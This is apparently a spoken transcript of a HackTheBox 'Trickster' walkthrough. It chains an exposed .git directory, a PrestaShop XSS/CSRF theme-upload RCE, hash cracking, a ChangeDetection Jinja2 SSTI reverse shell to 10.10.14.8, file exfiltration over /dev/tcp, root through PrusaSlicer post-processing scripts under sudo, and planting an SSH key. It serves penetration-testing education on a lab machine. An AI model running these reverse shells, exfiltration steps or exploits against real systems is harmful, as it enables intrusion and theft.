What's going on YouTube? This is Ipsec, and we'll be doing Trickster from HackTheBox, which starts off with finding a Prestashop website with an open .git directory that allows us to find the unique URL used for admin logins, and it also provides the Prestashop version. So some Googling around shows that Prestashop is vulnerable to cross-site scripting, but the HTTP only cookie is set, so we can't just steal the admin cookie. But thankfully, the proof of concept has a cross-site request forgery RCE chain for us that will use the admin's web browser to upload a malicious theme. With a shell on the box, we can dump the Prestashop database for more credentials and find another website called ChangeDetection is running. This is vulnerable to server-side template injection. Once we shell that, we get access to another directory that has some backups compressed with Brotli. Once we decompress them, we can find another credential to the Atom user who can run PrusaSlicer as root, which has a RCE vulnerability that gives us a root shell. So with that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, SV, enumerate versions, -vv for double verbose. This gives us things like the TTL, OA, output all formats, put in the nmap directory and call it Trickster, then the IP address of 10.10.11.34. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and the banner tells us it's an Ubuntu server. We also have HTTP on port 80, the banner is telling us it's Apache and redirecting us over to trickster.htb. So let's go ahead and add this to our host file. So we'll do sudo v etc host, and then we can add 10.10.11.34 trickster.htb. And let's take a look at the website. So we'll do http trickster.htb. And it is loading. It does take a little bit to load. If we look at the page source, we can look at to see if there's any like frameworks we recognize here, and I'm not seeing really anything. There's a lot of like lorem ipsum right here. Looks like maybe some type of shop or something. We have like prices of items, but it's all lorem ipsum. So let's just take a look at the site. If we look, there are links that appear to go nowhere. If we click on one like intro, the browser hangs for a little bit and it's going to give us just a single page. So looking at all these other links, we could click on them. It's going to take a little bit because it does go slow, but one is not like the others, and that is the shop. It goes to shop.trickster.htb. So I'm going to add this to my host file. So we'll do shop.trickster.htb, save that. And you could have also found this with something like ffuf. So if we like wanted to scan all virtual hosts, we could do ffuf-u http trickster.htb. We'll give it the word list of ops, sec list, discovery, DNS, subdomains, top million, 5,000. And then we'll give it the host header of host : fuzz.trickster.htb. And everything that is invalid is redirecting to 301. So we'll do FC for filter code, 301 to filter those out. And we get shop, which is oddly a 403. We'll talk more about this in just a little bit, but let's take a look at what the shop is to see if we actually get to a 403. So we'll do shop.trickster.htb, and it loads, looks like a web shop, right? Now the prices on the previous page are somewhat making sense. If we do Control U to look at the source, we can see, let's see, we have an online store right here. I'm looking to see where it loads like JavaScript or things like that. We have this PS underscore, and then also saying Prestashop right here, which is a popular like PHP application. I want to say it's PHP. If we do PHP Prestashop, instead of PHP, let's search GitHub Prestashop. Universal open source. Let's see what language this is, but this is going to be the product we're looking at, right? And we probably could have just like done index.php and got it, but there we go. We have PHP. And Prestashop is one of those unique login features. Well, I say feature, but there are two different logins here. If we click login, this is going to go to the customers. And then Prestashop also has an admin or employee login that's behind a hidden URL that changes with every install. So we don't know how the admin logs in. If we do a dir bust on this URL, so let's go over to that. We'll do gobuster-u. We'll give it the word list of ops, sec list, discovery, web content, raf small words, .text. That looks good. We have to put it in dir mode. Everything's returning 403. And this is because there's a web application firewall installed in this box. And we'll look at it at the very end of the video. But when gobuster first runs, it tries to identify like what a negative and positive code is. So it made a request to this random UUID, or maybe it's a GUID. But it makes a request here, and that gives a 403, and it's like, this should be a 404 error. So I'm just not going to scan because everything's looking the same, right? So it could be blacklisting on like user agents. That's the most popular way to blacklist various scanners. So we're just going to do -A to change the user agent. And I'm just going to do IPSEC. I would probably gather like a user agent off my browser and use that one because it may be a whitelist. And if it's a whitelist, it'll be much harder to, well, not much harder to evade, but you couldn't just guess and evade, right? It'll be more effective against a bunch of tools. So maybe it should whitelist like Mozilla Firefox or something like that in the banner. The issue with the whitelist, if you do like one-to-one, is all the browsers change based upon what version they are. So your whitelist becomes huge and you can't manage it. So you just have to have like various strings. But I digress. It's not a really good way to protect your application. So we are having a bunch of status 503s. So I'm going to change the negative status code. I think that is, let's see. We have URL, there we go, -B for negative status code. So the default is only 404 for it to not show. I also want to hide 503, I think it was. So do those two. And now we shouldn't have as many weird results. We could also do 403 probably, right? And see what we get. So I'm going to let this run and we'll come back when it's done. The gobuster hasn't finished yet, but we can see one interesting domain, a .get. So let's go take a look at what happens when we hit .get in this. And we see it looks like it's just a open Git repository. So what we can use is a tool called git-dumper to rebuild the .get file and get the source code of whatever's in this, right? So I'm going to make a directory called, I'll just call it git, I guess. And we'll do git-dumper. If you don't have this, it is a pip install. So you can do like pip3 install git-dumper. But let's see, what are the flags? Git-dumper, we give it the URL and then the directory, which I called git. And I'm not sure if I'll have to change the user agent because I'm not sure if it's like blacklisted or not, but it's not. So we can see it is going to fetch all the git objects. And then it should rebuild the directory once it is done. So if we go into the git directory now, we can see there is a .get. And if I did like git log, we could start seeing the website, right? We see the first commit is update admin panel. And if we look, we have admin 634E whatever. This is going to be the unique link that admins use to log in. So if we go back to the shop, I'm going to click back twice. And then we can go sign in so we can see what the two forms look like physically. So if we go here, this is the customer login. And if we do HTTP, shop Trickster HTTP, and then this weird admin 634 link, the login forms look completely different, right? And this one even leaks the version of Prestashop that is being ran. You could have also, if you use the dirbust, found like, I want to say like install.txt. And this will also kind of hint towards it being Prestashop 8. So there are other ways to find this thing. But in order for the next piece to work, you need to know this unique URL. And the only way to find that, to my knowledge, is that .get from being exposed. So if we now go over to Google, we're going to search Prestashop 815 exploit. And let's see. There's a GitHub advisory. I'm looking for a, there we go. Here's a blog post. Let's see, can download other customers' invoices. So this looks like it is like an IDOR vulnerability that we can just download customer invoices. That's not really too interesting to us. We have this CVE, the deceptive PNG trap, breaking down the PNG-driven XSS to remote code execution. So this is a good blog post. It's going to go over a lot of things. And the exploit here is somewhat complicated just because if we look at Prestashop itself, let's just see what's going on. Here we go. I should have a PHP session cookie, right? I do. HTTP only is set to true. So this cross-site scripting, we can't just steal the admin's PHP session cookie. We have to use like cross-site request forgery and have the admin do something that we want, right? And the exploit script on this blog post is going to automate all of that for us. It's going to install a Prestashop extension that allows for remote code execution. So I'm looking for where the GitHub link is. Let's see. GitHub, Prestashop, no. Where is it? There we go. So I'm just going to do git clone this POC. And then if we do Python 3 exploit.py-h, we can see all the things we need. So we need a URL. So we'll do http shop.trickster.htb. Email is going to be root@ipsec.rocks. Local IP, we'll do 10.10.14.8. And then admin path, that is going to be this. And you don't want to put any slashes on this. And we're going to run it, and it's magically going to give us a shell. It's not going to be an easy exploit to step through manually. So let's just look at exactly what's going on while this happens. So if we look at exploit.html, let's see. So the CVE is, if we go to Prestashop, there is a contact link somewhere. Is it just contact us? Can I guess it? There we go. So this link, if we choose a file for the attachment and give it a PNG file, then we can have cross-site scripting because it doesn't do any validation. It's actually a PNG. So we just give it a HTML file and then put a XSS payload here. Now this XSS payload is a bit more complicated than much of the other like easy boxes you may have seen, because normally we just steal the cookie, right? But we can't do that here. We have to force their browser to do things. So this script has a few functions. We have fetch token from HTML, which is going to fetch a token from HTML text. It's looking at the page for underscore token is equal to something, right? Now it's fetching the cross-site request forgery token. This is the token that's on each page that you just need to supply so the form knows you're coming from the expected place. Then we have this import theme, and that's where it starts. So upon the script being loaded, it's going to execute import theme, and then we can see it's going to get the location header, and it's fetching it from HTML, that first function. Now we're going to take that location header and extract the CSRF token from it. Now we have this form. It's going to import a theme, and it's pointing back at us. This is our web server, and then file name of the theme. So this is a malicious theme that just has a reverse shell built in. So we're using the admin's browser to just navigate to the import theme and say, hey, go install the theme from this server, and Prestashop goes and does that. So we can see right here, we have it just periodically making a request to see if the theme is installed. Here we go. It looks like the server made a request to us to get this malicious theme. We respond with a 200, we send it. And then the next time we make this GET request, we get the shell. So hopefully that somewhat makes sense. But now let's just upgrade our shell TTY or to a PTY. So we have a good terminal where we can clear the screen, do tab autocomplete, things like that. So I do Python-C, import PTY, pty.spawn, bin bash. We should do Python 3-C, and then I'll just copy and paste this. There we go. Then stty raw minus echo :4g. And then we can export term is equal to xterm, and that's going to let us clear the screen. So the first thing I always do when I pop a web server is try to find the database, right? So if we go in, let's just guess, we'll probably go var www And we can find Prestashop right here. We could also look at Trickster, which is probably the homepage of the site. There's no configuration there. HTML is just blank. So let's go into Prestashop. And if I didn't have, like, if this var www wasn't the correct spot, I would go in like the Etsy Apache 2 directory, look at the sites enabled, and pull where all the sites are, right? But we have Prestashop. So now we want to find where the config for the database is. So if we go in config, we can grep I'm going to grep password on all these files. Let's try this again. And let's see, we have bootstrap, db password, config, parameters, database password. So we got to find exactly where this file is. db slave, this does not look right. So if we go into the app directory, there is another config directory. So if we go in here, let's do the same thing with the grep to grep password. And let's see. There we go. We have parameters.php, database password, presta@shop_o. So let's cat the parameters.php, and then I'm going to grep database. There we go. The host is 127. The date name is Prestashop. The user is ps_user, and that's the password. So let's do MySQL-u, ps user, we'll do -p, and then paste this password in. There we go. I probably fat fingered something when I pasted. And let's see, we can do show databases, use Prestashop, and then show tables. And we have a bunch. So let's see, we want to look for like ps_, it's normally like users, right? And I didn't see that here. We don't have any U, maybe accounts. And looking at this, I don't see accounts either. There's API access. We could do select stir from ps_API access, but there's no keys or anything. We could just like manually look at all these tables for where the user would be, but I don't like doing that. We had access to the information schema table, so let's use this table. We normally use this in like SQL injection, right? To dump all the table information, but there's no reason we can't just use information schema to grab what we want, right? So we're going to select the table name and column name from the columns table, where column_name is like password. There we go. And we have two. We have PS customer and PS employee. So these two tables contain a field that has password. It's the reset password token, probably because the actual things probably hash or something like that. I don't know what the name of the field is, but now we know the two tables that have passwords potentially. So let's go back and use Prestashop, and then we can describe PS customer and see what the fields are. So let's see, first name, last name, email, passwd. And we can look at ps_employee as well. And it's the same thing. So let's do select star from ps. I don't want to do select star. We'll do select email passwd. And we get 3. So let's just copy these. Grab this. V users dot text. I should have called this like hashes dot text or something, but that's fine. Let's go with employees now and grab these two. Okay. So now let's see, let's remove everything that starts with a pipe and a space. Then we can say space pipe like that. That's going to be a colon. And then let's remove space pipe like that. There we go. Let's get rid of these extra spaces. And now we have a nice file that we can throw into Hashcat. So let's cat users.txt. And one of these hashes is not like the other. We have 2y and 2a. I'm not sure if Hashcat will be able to crack all these at once. So let's just see. I'm going to copy this. We'll SSH over to the Kraken, which is just another box I have my network. You can use anything you want to crack hashes. You can use your host machine. I just wouldn't recommend doing it in a VM. So let's v hashes. I'm going to call this trickster.presta maybe. Paste this. /hashcat. I think it's -- users because we have the usernames in there. Hashes trickster opt word list rocku. It's probably just -- user. There we go. And let's see. Probably going to be mode 3200. And is it going to crack all the passwords at once, or is it going to say one of these is invalid? Don't see anything just yet. So let's just make sure. Let's see. We have one right away. 1, 2, 3, 4, 5, 6, 7, 8, 9. That was a 2y1. So that looks like maybe, was that admin? Let's see. 2ycw. Nope, that was not admin. That was going to be public. Do status 1 out of 5. And we have 5 hashes. So I'm going to give this a couple minutes to see if it gets anything else, and we'll return. As I was talking, we have another one, always and forever. And this is going to be the 2A one. That was James, right? And if we wanted to, let's just say this crack had finished. We could just get rid of the word list. I think we still have to specify the mode. And then we can add -- show. And it would show us the results out of the hashcat.pot file. That is going to be, I think it's in your current directory, right? But that's why I like having the username in my word list, just because it keeps track of that. So we have a password for James, always and forever. If we look back at the machine itself, let's do cat etc passwd, grep everything that ends in sh, because those are going to be shells. There is a user called James. So we could try switching user to James, put this password in, and it works. We could also SSH. And I always like using SSH when I can, because the terminal is just going to be a lot more stable with SSH than reverse shell. You also get the colors and everything by default. It's all set up nice. So I always recommend, when you can, switch over to SSH. Now, as the James user, we can look at our home directory and get that user.txt. And the next step is a little bit tricky. If we did an IP A to look at all the IP addresses, we'll notice Docker is installed in the box. I bet if we did a PSEF forest as well, we can see Docker is running. So generally when I see Docker and I have a shell on the box, my first guess is, let's look for every Docker file to see if anything's exposed, right? Looking at this, actually, we can see there is a ChangeDetection running. And that's coming from the Docker namespace. So there's probably an application ChangeDetection or something. This definitely looks unique. But if we did not see that, we could do a find /name Docker file, and then pipe error messages to dev null, because it's going to go into a lot of directories that you just don't have access to, and we'll flood things, right? So if we look at this, it looks like we have only the Docker file from Prestashop. So that doesn't really help us, but we do see at least one container is running right here. So Docker will generally just use the next available IP address. So we could try 172.17.02, and we get that, right? We could also just upload nmap and do a ping scan on the box, and then scan all the Docker subnets. But in this, I'm guessing it's 172.17.02. So if we curl this, let's see, 02, we get a fail to connect. And also, you could have ran probably an arp command. And if you do arp-an, I believe this would show up anyways, because I think there's some automation hitting this or whatnot. But whenever I land on host, I always also like running the arp command to see what boxes this is talking to on the network. It's a good way to do local recon without having to run nmap, because nmap is noisy, right? But let's now go with a port scan to see exactly what ports this is listening on. So I'm going to do for port in, and we can do 1 to 65,535. You could either do it this way, or you could do like sequence 1, whatever, right? Whatever way you want. Both of these in Bash will get you a list of every number. Then we can do echo. I'm going to echo nothing to dev TCP 172.17.02, and then the port. And then we'll use the and this is going to mean if this command exits successfully, do something. And we're just going to go, we can say port is open, done. And then we're going to hide all the error messages because this is going to flood us whenever a port's not open with it, like can't connect and things like that. So we can see 5000 is marked as open. So port 5000 on 172.17.02, we can curl that. So we can curl 172.17.02 port 5000, and we get a page. So let's now do a port forward. So if the very first thing you type on your terminal line is squiggly C, it drops you into this little fancy prompt. And we can say, let's forward port 5000. Oh, we don't want to go to localhost. We want to say everything on our box, this is my parent instance, on port 5000, redirected to 172.17.02 on port 5000. There we go. Already in use. Okay. I don't know what's listening there, but let's just do, we'll do port lead. 172.17.02 to 5000. Okay. So now if I go HTTP, localhost, lead, this is going to go through SSH, and that's going to send it to 172.17.02 port 5000. And we get this message, we must be logged in. Please log in. And there's also a version here. So if we search ChangeDetection, this version, and ChangeDetection, I'm getting right here, the header. We also saw that Python script. There's a bunch of things. So we have this RCE, and let's see, obtain CSRF. I'm guessing this is logging in something, right? Let's see. URL port IP notification. This doesn't seem to have. Let's try this. I'm pretty sure you need to log in, but this script isn't showing it. So maybe there's another vulnerability that I didn't realize on this box. So I'm just going to call it exploit.py. We'll paste this. Python 3. I don't have Pwn tools on this. pip3 install. I don't feel like fighting with Python dependencies. Let's see. Let's search the CVE. I wonder if ChangeDetection can be configured without a password. See, looking at the CVE. I know how we'll test it without playing with the Python script. Let's see. So it looks like everything's pretty much doing the same thing. Okay. So let's just log into it real quick. And we can try the password we already have. And that's going to be from James. And we also have this 1, 2, 3, 4, 5, 6, 7, 8, 9. But let's try this password. And then after we get the exploit working, we're going to remove all the cookies and see if there's also an IDOR vulnerability to see if we could have done this without a password. I think that's the easiest way to go about this. So in ChangeDetection, the CVE states that if we go to the notification, we have SSTI here. So let's do something here. We just have to put anything in this URL list. Let's see. I think it supports JSON. This really doesn't matter. We just have to put something in the list so it works. And then the notification body, this is going to be where our SSTI payload goes. And we can copy it from one of the exploits. This is a long payload. I don't know if we need, that'll work. Okay. So this is going to import OS and then runs this Python command. I don't know if we need that double backslash on escaping. This is the problem when you copy and paste things out of an exploit script. Okay, let's just try this. Listen IP 10.10.14.8. Listen port 9001. This is too much. I don't think this is going to work. NC LVNP 9001. Send test notification. It did not. Okay. JSON 127.0.0.1. Let's just Google SSTI Python Jinja 2 popen. Let's just get a really easy payload. See, .read. Come on. Where's a good payload? I thought payload all the things would just have it. SSTI Payload OS RCE. Try this blog post. Let's see. There we go. We can try this. Which tab was it? Right here. There we go. Globals OS popen. We can say --c --i dev tcp 10.10.14.8 9001 0 and 1 like that. Okay. Send notification. Sent. Nothing. Globals built-in OS. That one should have worked. What if we don't have request application? Let's see. I bet there's, if we go to GitHub ChangeDetection, we go to their security page, maybe they have the advisory and a proof of concept there. Let's see. Path traversal, server-side template injection. Here we go. There we go. Self.init. This looks more likely to work. We'll paste that. --c --i dev tcp 10.10.14.8 9001 0 and 1. Is that how it works? I have a brain fart right now, so I'm just going to run this command in my local box and see if it works. We can run it there. And that. That did not. Okay, that's the order. There we go. So we know that payload works. Start this netcat back up. Send test. And there we go. We have a shell. So now I do want to take a step back real quick. And we're going to try this again, but I'm going to intercept it. And we're going to remove the cookie to see if there's also an IDOR vulnerability. So if we needed authentication, if authentication was set up. So we're going to send this to Burp Suite. Intercept is on. Send test notification. Send this over to the repeater tab. Let's see. Where is the cookie? We can remove this. Notification body. I don't see any of the cookie. send it, and CSRF is missing. So if we don't have the session cookie, then CSRF doesn't work. So I'm guessing if authentication is set up, then you need a password, right? So that's good. Let's just forward this request, get our shell. And we can say python 3-c import pty spawn bin bash. There we go. stty raw minus echo foreground export term is equal to xterm. Okay. So we're on the Docker container as root. We have a user on this box. So my very first thing is it like cap sh -h? How do we print it? -- print. There we go. We can look at all the capabilities and let's see. What am I looking for? I like looking at the make nod. This is a common one that normally works if we have this make nod privilege, which we don't because it's a exclamation point here, which means we don't have that privilege, so we can't easily privask. So looking at these, nothing really sticks out. You could probably use, I think it's like deep C or other scripts that just automate the enumeration of dangerous capabilities, but nothing looks like it's here. So my first step is looking at the Datastore directory. And we saw Datastore with that SSH, right? Remember when we did a PSEF forest? And let's see, Datastore, like it was pointed to this directory. Also, I bet if we went on this shell and did a mount command, oh God, that is big. Grep data. We do have it mounted here. So looking at this, we have a secrets.txt. So if we cat this file, it's just a ugly, probably SHA-256 sum or something. There are backups. If we look at it, there's 2 zips. So I'm going to go ahead and download these zip files. So we'll do nclvnp 9001, direct this one to this file name. And then let's do cat this to dev tcp 10.10.14.8 9001. Okay, we sent that file. Now let's send the other file. And cat this. There we go. So now we've downloaded both of the backups. So we'll do make directory backups, cd backups, 7-zip, extract, all the zips in one directory above. Uh-oh. Did that extract there? Are those empty? What just happened there? Change detection. Let's just move the zips here. 7zx. Let's extract this file. Okay. Let's see, we can extract the next file. Okay. So now we have all the backups extracted. We go in one of these directories. We have this f04 whatever.br and history.txt shows it. So if we Google, let's go over to google.com and I'm going to search for like BR extension. We can turn intercept off. Let's see, open source data compression, it's Brotli. And if you do an apt install Brotli, you can get this binary. If we do sudo apt search Brotli, let's just see. It should be one of these. There we go. There's the package. I already have it installed. So if we do Brotli -h, we can do a -d for decompress, and then f04. And now we just have the .txt, and we can view what this is. So we have a key. That is just a API private key. We have a public key. And we have a database user Adam and Adam admin 992. So the other user on this box was Adam, right? When we did the grep everything, let's cat etsy pass wd, grep everything that ends in sh. Adam is the other user. So we can try ssh adam at trickster.hdb, paste in that password, which was adam admin 992, and we get access to Adam's directory. There doesn't appear to be anything here. If we look at sudo, we can execute this binary opt PrusaSlicer as root. So if we go into opt PrusaSlicer, we can execute it to see exactly what it is. Display not set, GUI not available. There's the GitHub. So let's go take a look at exactly what this is. And it looks like it's something for a 3D printer. So let's click on the security tab to see if there's anything. Let's just Google PrusaSlicer RCE exploit to see if there's anything here. There is code execution. And let's see, for Linux BSC, CLI is enough. Let's see, is there a blog post? Let's search this CVE. Let's see, PrusaSlicer RCE. Okay, let's see. We have to create a malicious script in the post process of this. So what we're going to do is copy these files over to our box. We could also probably do like a git pull and just pull the latest, but I'm going to use the ones that are on the box because maybe it's patched on the latest and not here, right? So let's do a scp-r. We can say trickster.hdb opt PrusaSlicer here. And we also want to specify the Adam user. It was what? Adam admin 992. It was awesome. So now it's going to download this. We could have also tried like X11 forwarding. So if we did sh-y, it's either dash capital X or Y. I think both of them do it. Adam at trickster.hdb. Adam admin 992. We'll see if it's set up. We have X11 forwarding request failed. So I don't think we can. Cat etsy sh shd config grep-i x11. I think it is set to yes. Maybe that's failed on my end. But if we did a proper X11 forward, then we could just run this and then the GUI would be forwarded over to our box. But for some reason, when I do that sh command, it fails. And I'm not going to look too much into it. So if we execute PrusaSlicer when we have a display set, we get this nice application. Let's do not send anything. Let's not update. Let's open the project trickster.m3f. And let's see. Configuration. Where can we go? Not the wizard. Print settings. Output options. Post-processing scripts. So I'm just going to do bin bash. And then, let's see. Does the CVE say anything? Post-process. We run the command. And then we do a ampersand. So this may just give me a bash shell. So what are they doing here? Windows CMD username. They use I wonder if I need semicolon post process equals. Let's try this first. We can save file. We'll save project. Let's save project as. I'm going to call it pwn.3mf. And let's copy it over to the box. So I'm just going to stand up HTTP server, and we can curl HTTP 10.10.14.8 8000 pwn.3mf. Let's copy it to dev shm pwn.3mf. Okay. And let's see, it uses -s and then the extension or the file. So it looks like it's going. And then failed processing output file name format template. And if we look at the command, we have output file name. So it can't process something in this G code. So I'm just going to call it pwn.gcode. We're not going to do any complex template. Let's just save the preset, save the project. Let's make sure it's still pwn.3mf. Replace. Let's re-download that file, run it again, and let's see what happens. Well, we probably should be running this sudo, right? It's exporting the G code. Slicing result. If I do exit, the connection closed. Adam admin 992. So we need to make sure we run that with sudo. We'll try it with this. And see if this just magically works. It's exporting. It did not. So the post-process script, I don't know how to make this font bigger. View, I don't see anything. Maybe we don't do a semicolon to start it off with. Let's just do bin bash, and then we'll do the comment. We'll save preset, file, save project, save, curl HTTP. Let's just copy it. Grab this. Rerun it. So this file doesn't have the semicolon before bin bash. Does this work? It's exporting the code. Come on. ID. Oh, there we go. We have a shell. It just doesn't give us the like whatever this is called, right? The terminal or terminal prompt. But we can see we are root. So if we do cd/root, we have root.txt. And that is going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time. Actually, I lied. There's one last thing I want to do, and that is look into the mod security thing that's blocking like some user agents, right? So let's go into .ssh, see if that directory exists. It looks like the directory exists, but there's no files in it, right? So let's do ssh-keygen-f. We'll just call it idrsa. And then we can move idrsa.pub to authorized keys. Let's cat idrsa, grab this file, and we'll bring it back to our box. So v idrsa, paste it, chmod 600, sh-i root at 10.10.11.34. I think that's the IP for Trickster. There we go. So we have a better prompt. Awesome. So let's just go in, what was it? Etsy Apache 2, sites enabled. Let's see, do we have anything interesting here? The default, nothing. Let's look at Prestashop real quick. Server name, override all, error log, set handler. I don't really see anything here. Let's go to mods enabled. And let's see, do we have anything? We have security 2. Anything mod? Let's see, security 2 .config. What is this? Request URI. This looks like it's it. We have varcache mod security, modsecurity.conf, and we also have the user share mod security core rule set. So it's loading all those. Let's go over here. We look at rules. Let's see. I'm going to grep-ri gobuster. There we go. So it looks like it's probably going to block all these in scanner user agents, right? So if we look at this file, we have a bunch of user agents. It looks like they do comments and then that. Oddly enough, Ness's front end is Bilbo, or it used to be. Is it like Lord of the Rings or something? That is weird. Let's just grep-v everything that begins with a comment on scanners. And this would be a list of everything that's blocked, right? You can see ffuf is blocked, wfuzz. You can just see a lot of funny user agents there. It's blocking nuclei, openvas, Nessus there. So yeah, that's going to be the video. Hope you guys enjoyed it. Take care, and I'll see you all next time.